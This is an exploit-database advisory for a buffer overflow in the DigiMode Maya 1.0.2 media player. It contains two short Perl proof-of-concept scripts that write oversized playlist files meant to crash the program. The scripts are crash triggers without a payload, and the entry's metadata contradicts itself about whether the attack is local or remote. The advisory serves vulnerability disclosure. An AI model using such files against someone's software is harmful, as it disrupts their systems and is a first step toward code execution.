DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs

2009.06.01
Credit: SirGod
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

##################################################################################################### # DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC # Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org ###################################################################################################### my $chars= "A" x 1337; my $file="sirgod.m3u"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file was created"; print "SirGod - www.mortal-team.net & www.h4cky0u.org"; ##################################################################################################### # DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC # Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org ###################################################################################################### my $chars= "A" x 1337; my $file="sirgod.m3l"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file was created"; print "SirGod - www.mortal-team.net & www.h4cky0u.org";


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top